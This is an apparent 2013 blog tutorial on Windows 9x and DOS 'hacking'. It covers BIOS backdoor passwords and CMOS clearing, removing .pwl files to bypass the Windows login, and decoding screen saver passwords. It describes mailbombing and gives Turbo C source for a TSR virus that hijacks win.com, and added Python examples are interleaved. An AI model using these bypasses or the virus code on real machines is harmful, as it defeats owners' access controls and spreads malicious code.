Posted by : Unknown
Friday, July 26, 2013
Hacking
1. Introduction:
Hacking is an intellectual activity, a sort of mental gymnasium. Hackers are curious people who have that extra bit of knowledge about how things really work.
The original hackers were computer enthusiasts who knew everything about the way software works and had an uncanny ability to find ways of doing what was thought impossible.
They debug code and use trial and error to discover unknown tricks and secrets. They do try to break into systems, but have the decency not to cause any damage; instead they report what they found to the system administrator.
2. Hackers Vs Crackers:
A hacker is a computer enthusiast who peeps into other people's computers without harming them. Hackers are, by and large, nice people from whom you can learn a lot.
Having said all this, I must admit that there is a thin line between hackers and crackers.
Crackers are the ones who intend to harm other people's computers: besides gaining unauthorized entry, they try to destroy other people's resources.
3. Hacking BIOS passwords:
The BIOS is the firmware that runs before the operating system. Its setup program holds the basic settings of your computer, such as how many and what kinds of disk drives you have, which ones are enabled and which are disabled, and which ones are used for booting. These settings are held in the battery-backed CMOS RAM on the motherboard.
A common method of entering the BIOS setup is pressing the Del key at boot up. Most computers have a BIOS which can be configured to ask for a password as soon as the computer is switched on. If the ask-password option is enabled, then as soon as the PC is switched on a dialog box welcomes you and asks for the password. You cannot type your way past it, and you cannot turn the option off from inside the BIOS setup without knowing the password. The most common way of getting past the prompt is to try the manufacturer's default (backdoor) passwords. Some that old Award BIOSes accepted are:
J262
AWARD_SW
AWARD_PW
The company name and version of the BIOS are displayed on the screen each time the system boots, so you know which list of defaults to try.
If the default passwords do not work, the other way is to clear the CMOS by removing the lithium coin cell from the motherboard and putting it back after a while (many boards also have a "Clear CMOS" jumper that does the same thing without removing the battery). Either way the settings return to factory defaults, and the password goes with them.
On some old machines a series of keystrokes is said to crash the password program: boot the PC, wait for the password prompt, then keep pressing Ctrl+Esc 50 to 100 times. If it works, the password program crashes and the computer continues booting.
The last method is not a password guess; it invalidates the CMOS contents so that on the next boot the BIOS reports a checksum error, loads its defaults, and no longer asks for a password. To clear the CMOS this way, boot to DOS, run DEBUG and type the following (that is the letter o, DEBUG's "output to port" command, not the digit zero):
C:\>DEBUG
-o 70 2e
-o 71 ff
-q
C:\>exit
Then restart the computer. Port 70h selects a CMOS byte (here 2Eh, where the checksum is kept) and port 71h writes a value to it; writing FFh there corrupts the checksum.
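Why that DEBUG sequence works, as an added example in Python (not code from the original post): it models the CMOS RAM behind ports 70h/71h with the conventional AT layout, in which the bytes 10h to 2Dh are covered by a 16-bit checksum kept at 2Eh (high byte) and 2Fh (low byte). The layout, the sample setting bytes and the helper names are assumptions of this example; a particular BIOS may checksum a different range or keep the password elsewhere, which is why the trick does not work on every machine.

```python
"""Model of the CMOS checksum that the post's 'o 70 2e' / 'o 71 ff' breaks.

Added example, not part of the original post. Assumes the classic
AT-compatible layout: setup bytes 0x10..0x2D are checksummed and the 16-bit
sum lives at 0x2E (high byte) and 0x2F (low byte). Vendors may differ.
"""

CMOS_SIZE = 64                              # bytes reachable via ports 70h/71h
CHECKSUM_START, CHECKSUM_END = 0x10, 0x2D   # inclusive range covered
CHECKSUM_HI, CHECKSUM_LO = 0x2E, 0x2F       # where the sum is stored


def cmos_checksum(image: bytes) -> int:
    """Sum of the covered bytes, truncated to 16 bits."""
    return sum(image[CHECKSUM_START:CHECKSUM_END + 1]) & 0xFFFF


def stored_checksum(image: bytes) -> int:
    """The checksum the BIOS wrote the last time Setup saved."""
    return (image[CHECKSUM_HI] << 8) | image[CHECKSUM_LO]


def checksum_valid(image: bytes) -> bool:
    """What the BIOS checks at power-on before trusting the settings."""
    return cmos_checksum(image) == stored_checksum(image)


def seal(image: bytearray) -> bytearray:
    """Write the correct checksum, as Setup does when you save and exit."""
    total = cmos_checksum(image)
    image[CHECKSUM_HI] = total >> 8
    image[CHECKSUM_LO] = total & 0xFF
    return image


def cmos_write(image: bytearray, index: int, value: int) -> bytearray:
    """Model of DEBUG's 'o 70 <index>' followed by 'o 71 <value>'.

    Bit 7 of the index written to port 70h is the NMI-disable bit, not
    part of the address, so it is masked off here.
    """
    index &= 0x7F
    if index >= CMOS_SIZE:
        raise ValueError("index outside the modelled CMOS")
    image[index] = value & 0xFF
    return image


def make_sample_image() -> bytearray:
    """Constructed sample: arbitrary setup bytes, sealed with a good checksum."""
    image = bytearray(CMOS_SIZE)
    for i in range(CHECKSUM_START, CHECKSUM_END + 1):
        image[i] = (i * 37) & 0xFF
    return seal(image)


def debug_trick(image: bytearray) -> bytearray:
    """The post's recipe: o 70 2e, then o 71 ff."""
    return cmos_write(image, 0x2E, 0xFF)


if __name__ == "__main__":
    img = make_sample_image()
    print("checksum valid before:", checksum_valid(img))
    debug_trick(img)
    print("checksum valid after: ", checksum_valid(img))
    print("so the BIOS reloads defaults, password included")
```

The sum of 30 bytes can never reach 0xFF00, so after the write the stored high byte (FFh) cannot match the computed one; the BIOS sees a checksum error regardless of what the settings were.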
4. Windows torn apart:
Hacking Windows Login Passwords:
Windows 9x keeps each user's cached passwords in a file named after the user with the extension .pwl in the Windows directory. To get past the Windows login password, reboot and wait for the message:
"Starting Windows 95..."
When you see this on the screen, press F8 (Windows 98 does not show the message; hold Ctrl while it boots instead). The boot menu will come up. Select "Command prompt only" (its number varies between versions) to boot into DOS. Then go to the Windows directory by typing
C:\>cd windows
Then rename all files with the extension .pwl by typing the following command:
C:\windows>ren *.pwl *.xyz
Or delete them by typing
C:\windows>del *.pwl
Now when the Windows login prompt pops up, type anything you like as the password. Since no .pwl file exists for the user any more, Windows treats what you typed as a new password and creates a fresh .pwl file with it. (The Windows 9x login is not a security boundary in any case: pressing Esc or Cancel at the prompt gets you onto the desktop, just without the cached network passwords.)
If the F8 key is disabled, then boot from a floppy and delete *.pwl from the Windows directory.
There is also a way of disabling the F8 key. Simply follow these steps.
1.
Find the file msdos.sys, which lives in the root of C:\. Since it is a hidden, read-only system file, you first have to make it writable by changing its attributes:
C:\>attrib -h -r -s msdos.sys
2.
Open msdos.sys in WordPad (or the DOS EDIT program).
3.
You will see something that looks like this:
; FORMAT
[Paths]
WinDir=C:\WINDOWS
WinBootDir=C:\WINDOWS
HostWinBootDrv=C
[Options]
BootMenu=0
BootMulti=1
BootGui=1
DoubleBuffer=1
AutoScan=1
WinVer=4.10.1998
;
To disable the function keys (F4, F5, F6 and F8) during boot up, insert the following line directly below [Options]:
BootKeys=0
Setting BootDelay=0 only removes the short window in which the keys are accepted; BootKeys=0 disables them outright. A bootable floppy still gets around this, which is why the previous paragraph told you to keep one.
4.
Since msdos.sys is an important system file, change its attributes back to hidden, read-only and system by typing
C:\>attrib +h +r +s msdos.sys
Changing Windows Visuals:
Changing the Windows logo:
On a normally configured computer the same splash screen greets you every time you boot, and the same "Please wait while Windows shuts down" and "It is now safe to turn off your computer" screens appear at shutdown. All three are ordinary 256-colour bitmaps of 320 x 400 pixels that have been renamed with a .sys extension: the startup logo is C:\logo.sys, the "please wait" shutdown screen is C:\Windows\logow.sys and the "safe to turn off" screen is C:\Windows\logos.sys. The following procedure changes them to whatever the user wants. As they are hidden system files, first change their attributes. Go to MS-DOS and type the following:
C:\windows>attrib -s -h -r logos.sys
Now do the following steps to get the screen you want:
Step1. Open MS Paint
Step2. From the File menu select Open
Step3. Open c:\Windows\logos.sys
Step4. This opens the boring screen. Change it as you like and save it again as logos.sys, as shown in fig(a). Keep it a 256-colour bitmap of the same size, or Windows will not display it properly.
Step5. Type at the command prompt: attrib +h +r +s logos.sys
Changing the Shut Down Screen:
Go to the command prompt and make logow.sys writable in the same way, open it in Paint, change what you want and save it as logow.sys. This changes the boring "please wait" shut down screen. The startup logo, C:\logo.sys, is handled the same way.
Hacking the Windows screen saver password:
This is an interesting hack and not many people know about it. It requires no canned hacking tool; we will crack the password manually.
If a screen saver is password protected, it does not allow us to do anything on the system until we enter the password; here not even Ctrl+Alt+Del helps.
Windows 9x stores the screen saver password, in an encoded form, in the user.dat registry hive in the Windows directory (the ScreenSave_Data value under HKEY_CURRENT_USER\Control Panel\desktop). The encoding is not real encryption: it is a fixed transformation of the characters, so you can learn it on your own machine by setting screen saver passwords made of the letters whose codes you want to know and reading back the stored bytes. Once you have a table of letters and their corresponding codes you can recover any password built from those letters.
For example, suppose the password is DOPE and the stored codes read back as:
D = 0C
O = A1
P = 26
E = 58
To break a password on another machine, open its user.dat, find the stored bytes and translate them with the table you built. Check first that a letter's code does not depend on its position in the password (set a password like DD and see whether both bytes match); if it does, you have to build the table per position.
Customize your Operating System by Editing Explorer.exe:
Do not try to edit explorer.exe from a DOS box while Windows is running: the file is in use and Windows will not let you write to it.
Restart the computer in MS-DOS mode.
Once you get your DOS prompt, go to the Windows directory by typing
C:\>cd windows
Once you are in the Windows directory, open explorer.exe in the MS-DOS editor in binary mode, i.e. type
C:\windows>edit /70 explorer.exe
(the /70 switch loads the file as binary, wrapped at 70 characters per line). The screen will look full of weird characters, as if written in machine language. Each symbol is one byte, and you can see its numeric value at the bottom right of the screen after VALUE:.
In the author's copy of explorer.exe, lines 2334 to 2348 hold the strings that appear when you click the Start button (the line numbers differ between versions). You can change Shut Down to any name, even Programs to Hackings, as long as the replacement has the same number of letters.
Then at line 2390 comes a very interesting part: the text on the START button itself. If you look carefully at line 2390 you will find that a clubs symbol precedes "S t a r t" (the letters are spaced out because the string is stored in 16-bit Unicode, with a zero byte after each letter). If you move the cursor over the club you will find that its value is 5: every string in this table is stored with its length in front of it, and the count is 5 because Start has five letters. So the text after the clubs symbol has to be of that many letters. If you want to replace Start with something like Stop, which is 4 letters, the safe way is to keep the count at 5 and write "Stop " with a trailing space. Pasting a symbol whose value is 4 over the club, as one might be tempted to, leaves a stray letter behind that shifts every string after it in the same table. A 132-letter name will not fit at all: the strings are packed one after another and there is no room to grow one without moving the rest.
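The length prefix described above is the STRINGTABLE resource format, and the following added Python example (not code from the original post) shows the safe way to patch it: find the entry whose count and text match, keep the count, pad a shorter replacement with spaces, and refuse anything longer. The sample bytes are constructed here rather than taken from a real explorer.exe, and the helper names are the example's own. A naive_shrink function reproduces the shrink-the-count idea so that you can see how the following strings get shifted.

```python
"""Patching a length-prefixed Unicode string (the START button text)
without corrupting the string table.

Added example, not part of the original post. Windows STRINGTABLE
resources store each string as a 16-bit little-endian count (the post's
'clubs symbol', 5 for Start) followed by that many UTF-16LE characters,
packed one after another with no separators. The sample block below is
constructed for the example; helper names are hypothetical.
"""

import struct


def encode_entry(text: str) -> bytes:
    """One string-table entry: WORD count followed by UTF-16LE characters."""
    return struct.pack("<H", len(text)) + text.encode("utf-16-le")


def decode_block(data: bytes) -> list:
    """Walk a packed block of entries the way LoadString does."""
    out, pos = [], 0
    while pos + 2 <= len(data):
        (count,) = struct.unpack_from("<H", data, pos)
        pos += 2
        out.append(data[pos:pos + 2 * count].decode("utf-16-le"))
        pos += 2 * count
    return out


def patch_string(data: bytes, old: str, new: str) -> bytes:
    """Replace the entry for `old` with `new`, keeping the count unchanged.

    A shorter replacement is padded with spaces so the bytes after it stay
    where they were; a longer one cannot fit and is refused.
    """
    if len(new) > len(old):
        raise ValueError(f"{new!r} does not fit in {len(old)} characters")
    needle = encode_entry(old)
    pos = data.find(needle)
    if pos < 0:
        raise ValueError(f"entry {old!r} not found")
    padded = new.ljust(len(old))
    return data[:pos] + encode_entry(padded) + data[pos + len(needle):]


def naive_shrink(data: bytes, old: str, new: str) -> bytes:
    """Overwrite the count and the letters in place, leaving stray bytes.

    This is what shrinking the count to 4 does: the unused 't' of Start is
    then read as the count of the next string, which garbles it.
    """
    pos = data.find(encode_entry(old))
    if pos < 0:
        raise ValueError(f"entry {old!r} not found")
    body = new.encode("utf-16-le")
    return data[:pos] + struct.pack("<H", len(new)) + body + data[pos + 2 + len(body):]


# Constructed sample: three consecutive entries of one string-table block.
SAMPLE = b"".join(encode_entry(s) for s in ("Programs", "Start", "Shut Down"))


if __name__ == "__main__":
    print("original:", decode_block(SAMPLE))
    print("safe:    ", decode_block(patch_string(SAMPLE, "Start", "Stop")))
    print("naive:   ", decode_block(naive_shrink(SAMPLE, "Start", "Stop")))
```

Run on a real explorer.exe the same find-and-replace applies to the whole file, but keep a backup: the resource also sits inside a PE image, and the file size and offsets must not change.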
5. Registry Hacking:
Structure of the Registry:
The registry is a hierarchical database that contains virtually all information about your computer's configuration.
The registry editor is a utility, regedit.exe, that lets you see, search, modify and save the Windows registry database.
The registry editor window is divided into two panes: the left one shows the hierarchical structure of keys, the right one shows the values stored in the selected key.
The principal keys of the registry are:
HKEY_LOCAL_MACHINE:
This key contains hardware, application and service information. Much of the hardware information is updated automatically while the computer is booting. The data stored in this key is shared by all users.
HKEY_CLASSES_ROOT:
This key is an alias of the branch HKEY_LOCAL_MACHINE\Software\Classes and contains OLE, drag 'n' drop, shortcut and file association information.
HKEY_CURRENT_CONFIG
This key is also an alias, of the subkey under HKEY_LOCAL_MACHINE\Config that holds the current hardware profile.
HKEY_DYN_DATA
Some information in the registry changes frequently, so Windows maintains part of the registry in memory instead of on the hard disk. For example, it keeps computer performance statistics here.
HKEY_USERS
This contains the information about the different users existing on the system.
HKEY_CURRENT_USER
This is the branch of HKEY_USERS for the user currently logged on.
Disabling display of drives in My Computer:
To disable the display of local drives when you click My Computer, go to:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
Now, in the right pane create a new DWORD item and name it NoDrives. Modify its value and set it to 3FFFFFF (hexadecimal). Each of the low 26 bits stands for one drive letter, bit 0 being A: and bit 25 being Z:, so 3FFFFFF hides all of them; to hide just D:, for instance, set the value to 8. Press F5 to refresh. When you click on My Computer, no drives will be shown. To enable the display of drives in My Computer, simply delete this DWORD item. Note that NoDrives only hides the drives in Explorer; they can still be reached by typing a path or from a DOS box.
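The value 3FFFFFF is a bitmask, and the following added Python example (not code from the original post) builds it from a set of drive letters, decodes it back, and writes the result out as a .reg file that regedit can import (Registry > Import Registry File). The helper names and the sample drive letters are the example's own.

```python
"""NoDrives bitmask helper.

Added example, not part of the original post. Bit n of the NoDrives DWORD
hides drive letter chr(ord('A') + n); 0x3FFFFFF sets all 26 bits. The
REGEDIT4 header is the Windows 9x .reg format. Helper names are hypothetical.
"""

import string

LETTERS = string.ascii_uppercase
ALL_DRIVES = (1 << 26) - 1          # 0x3FFFFFF, the value in the post
POLICY_KEY = r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"


def no_drives_mask(letters: str) -> int:
    """Bitmask that hides the given drive letters, e.g. 'CD' -> 0b1100."""
    mask = 0
    for ch in letters.upper():
        if ch not in LETTERS:
            raise ValueError(f"not a drive letter: {ch!r}")
        mask |= 1 << (ord(ch) - ord("A"))
    return mask


def hidden_drives(mask: int) -> str:
    """Inverse: the drive letters a NoDrives value hides, in order."""
    return "".join(ch for i, ch in enumerate(LETTERS) if (mask >> i) & 1)


def reg_file(mask: int, no_find: bool = False) -> str:
    """Text of a .reg file applying NoDrives (and optionally NoFind)."""
    lines = ["REGEDIT4", "", f"[{POLICY_KEY}]", f'"NoDrives"=dword:{mask:08x}']
    if no_find:
        lines.append('"NoFind"=dword:00000001')
    return "\r\n".join(lines) + "\r\n"


if __name__ == "__main__":
    print(hex(no_drives_mask("CD")))          # 0xc
    print(hidden_drives(ALL_DRIVES))          # ABCDEFGHIJKLMNOPQRSTUVWXYZ
    print(reg_file(no_drives_mask("D"), no_find=True))
```

Deleting the NoDrives value restores the drives, exactly as the text says; importing a .reg file cannot delete a value, so do that step in regedit.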
CLSID Folders:
Folders like Control Panel, Dial-up Networking, etc. are system folders. Each system folder is identified by a unique CLSID (class ID), a GUID stored under HKEY_CLASSES_ROOT\CLSID.
The following are the CLSID values of the most commonly used icons:
My Briefcase: {85BBD920-42A0-1069-A234-08002B30309D}
My Computer: {20D04FE0-3AEA-1069-A2D8-08002B30309D}
Recycle Bin: {645FF040-5081-101B-9F08-00AA002F954E}
To change the name of the Recycle Bin folder, go to
HKEY_CLASSES_ROOT\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}
In the right pane, change the (Default) value to whatever name you want.
To remove the Recycle Bin from the desktop, go to
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\explorer\Desktop\NameSpace
and delete the key {645FF040-5081-101B-9F08-00AA002F954E}. Export the key first (Registry > Export Registry File) so that you can put it back.
To remove the Find option from the Start Menu, go to
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
Right click in the right pane and select New, DWORD value. Name it NoFind. Double click the newly created DWORD to edit its value and enter 1. This disables the FIND option of the Start Menu.
To restore the FIND command, simply delete the DWORD value.
6. Peeping the Internet:
Ping:
Ping sends an ICMP echo request to a host, which answers with an echo reply; the host spends a little memory and CPU time to answer each one. The old claim is that if you ping a host perpetually, a time will come when all its resources are used up and it hangs or restarts. In practice a single machine sending one request a second does not come close: each reply is cheap, and the host frees what it used as soon as it has answered. What did take hosts down in the 1990s was the "Ping of Death", an oversized fragmented echo request that crashed unpatched IP stacks, and what still can is a flood of requests from many machines at once, which is a bandwidth problem rather than anything special about ping.
You can even ping yourself. The IP address 127.0.0.1 is the local host, which means that when you connect to 127.0.0.1 you actually connect to your own machine. So to ping yourself, ping 127.0.0.1; it proves only that your own TCP/IP stack works.
Tracert:
When you type hotmail.com in your browser, your request passes through a number of routers before reaching hotmail.com's server, and when you log in to a shell account and type the password, that password travels the same sort of path. To list the hops a packet passes through, use the TRACERT command (traceroute on Unix). The hops it shows are routers, not servers, and whether any of them can read your password depends on the protocol: a telnet password crosses them in clear text, an SSH password does not.
Mailbombing:
Mail bombing means sending a huge number of e-mails to a single e-mail account so that the account's storage fills up, the owner cannot receive any important e-mails, and it becomes difficult to find the existing ones.
All e-mail accounts have a maximum storage limit. For example, Yahoo at the time had a limit of 3MB. Once this limit is reached, no new messages can come in and the mail server bounces any new message that arrives, so if the victim who has been mailbombed is expecting an important message, he can pretty much kiss it goodbye.
7. Towards Cracking:
Virus:
Here is sample C code (Turbo C for DOS) to illustrate a simple virus that hijacks win.com, the program that starts Windows.
The idea is to take over the interrupt vector table (IVT): the program installs itself as a TSR and points the entry for interrupt 09h (the keyboard) at its own handler. When any key is pressed, control passes to our code, which renames win.com to oldwin.com and puts our own mywin.com in its place, so that the next time Windows is started our program runs first. The handler uses the size of win.com as a marker so that the swap is done only once (123 stands for whatever size mywin.com has). Note that calling stdio or system() from inside a hardware interrupt handler is unsafe, since DOS is not re-entrant; this is a proof of concept, not something to run on a machine you care about.

/* tsr.c -- Turbo C for DOS. Hooks INT 09h and swaps win.com on the next keypress. */
#include <stdio.h>
#include <stdlib.h>
#include <dos.h>        /* getvect, setvect, keep */

#define INTR 0x09       /* keyboard hardware interrupt */

void interrupt (*oldhandler)(void);

void interrupt handler(void)
{
    FILE *fp;
    long len = -1L;

    /* Marker check: if win.com already has mywin.com's size, the swap is done. */
    fp = fopen("c:\\windows\\win.com", "rb");
    if (fp != NULL) {
        fseek(fp, 0, SEEK_END);
        len = ftell(fp);
        fclose(fp);
    }
    if (len != 123L) {
        system("cd c:\\windows");
        system("ren win.com oldwin.com");
        system("ren mywin.com win.com");
    }
    oldhandler();       /* let the real keyboard handler process the key */
}

int main(void)
{
    oldhandler = getvect(INTR);     /* save the old interrupt vector */
    setvect(INTR, handler);         /* install the new interrupt handler */
    keep(0, 500);                   /* terminate and stay resident */
    return 0;
}

/* mywin.c -- the file that gets renamed to win.com. It runs the TSR again. */
#include <stdio.h>
#include <process.h>

int main(void)
{
    int result;

    /* spawnl takes the program name as arg0 and a NULL terminator */
    result = spawnl(P_WAIT, "tsr.exe", "tsr.exe", NULL);
    if (result == -1) {
        perror("error from spawnl");
        return 1;
    }
    return 0;
}
8. Pros & Cons:
Pros:
1. Fortifies security in a roundabout way
2. Checks for loopholes in our applications
3. Calls for a high level of thinking and analysing ability
4. Explores the unexplored
Cons:
1. Risk of being misunderstood
2. Risk of loss of sensitive data
9. Conclusion:
In closing, I would say that hacking is an extraordinary intellectual activity.
All hackers know that an important part of the hacker ethic is never to delete files or cause any damage. Make good use of that extra bit of knowledge.